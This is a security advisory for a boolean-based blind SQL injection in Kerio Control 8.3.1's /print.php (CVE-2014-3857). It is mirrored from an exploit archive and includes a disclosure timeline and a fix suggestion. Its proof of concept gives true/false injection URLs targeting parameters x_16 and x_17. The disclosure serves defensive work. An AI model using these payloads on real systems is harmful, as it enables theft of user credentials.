Skip to content
cyberexploits
webappphptext

Kerio Control 8.3.1 - Blind SQL Injection

Kerio Control 8.3.1 - Blind SQL Injection

Publié le 2014-07-02

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/php/webapps/33954.txt7eac4c3a
raw
Document Title: 

======================

Kerio Control <= 8.3.1 Boolean-based blind SQL Injection



Primary Informations:

======================



Product Name: Kerio Control

Software Description: Kerio Control brings together multiple capabilities 

 including a network firewall and router, intrusion detection and 

 prevention (IPS), gateway anti-virus, VPN and content filtering. These 

 comprehensive capabilities and unmatched deployment flexibility make 

 Kerio Control the ideal choice for small and mid-sized businesses.

Affected Version: Latest Version - 8.3.1 (released on 2014-05-20)

Vendor Website: http://kerio.com

Vulnerability Type: Boolean-based blind SQL Injection

Severity Level: Very High

Exploitation Technique: Remote

CVE-ID: CVE-2014-3857

Discovered By: Khashayar Fereidani

Main Reference: http://fereidani.com/articles/show/76_kerio_control_8_3_1_boolean_based_blind_sql_injection

Researcher's Websites: http://fereidani.com http://fereidani.ir

                       http://und3rfl0w.com http://ircrash.com

Researcher's Email: info [ a t ] fereidani [ d o t ] com





Technical Details:

=======================



Kerio Control suffers from a SQL Injection Vulnerability which can lead to gain users 

 sensitive informations like passwords , to use this vulnerability attacker need a 

 valid client username and password .



Vulnerable path: /print.php

Vulnerable variables: x_16 and x_17

HTTP Method: GET



Proof Of Concept:

=======================



Blind Test:

 TRUE: https://[SERVER IP]:4081/print.php?x_w=overall&x_14=L1&x_15=stats&x_16=16221 AND 1=1&x_17=16221&x_18=-1&x_1b=&x_1a=&x_1l=[ VALID SESSION]&x_3k={%27x_fj%27%3A16220%2C+%27x_fk%27%3A+16220}&x_3l={%27x_fj%27%3A16222%2C+%27x_fk%27%3A+16222}&x_1c=&x_1e=-270&x_1f=-1&x_3m=0&x_11=overall&x_12=individual&x_13=x_2l

 FALSE: https://[SERVER IP]:4081/print.php?x_w=overall&x_14=L1&x_15=stats&x_16=16221 AND 1=2&x_17=16221&x_18=-1&x_1b=&x_1a=&x_1l=[ VALID SESSION]&x_3k={%27x_fj%27%3A16220%2C+%27x_fk%27%3A+16220}&x_3l={%27x_fj%27%3A16222%2C+%27x_fk%27%3A+16222}&x_1c=&x_1e=-270&x_1f=-1&x_3m=0&x_11=overall&x_12=individual&x_13=x_2l

 



Solution:

========================

Valid escaping variables or type checking for integer





Exploit:

========================

Private





Vulnerability Disclosure Timeline:

==================================

May 30 2014 - Disclosure 

May 31 2014 - Received a CVE ID

May 31 2014 - Initial Report to Kerio Security Team

June 3 2014 - Support team replied fix is planned to be included in a future release

June 30 2014 - Patched

July 1 2014 - Publication





                                           Khashayar Fereidani - http://fereidani.com
Voir sur GitHub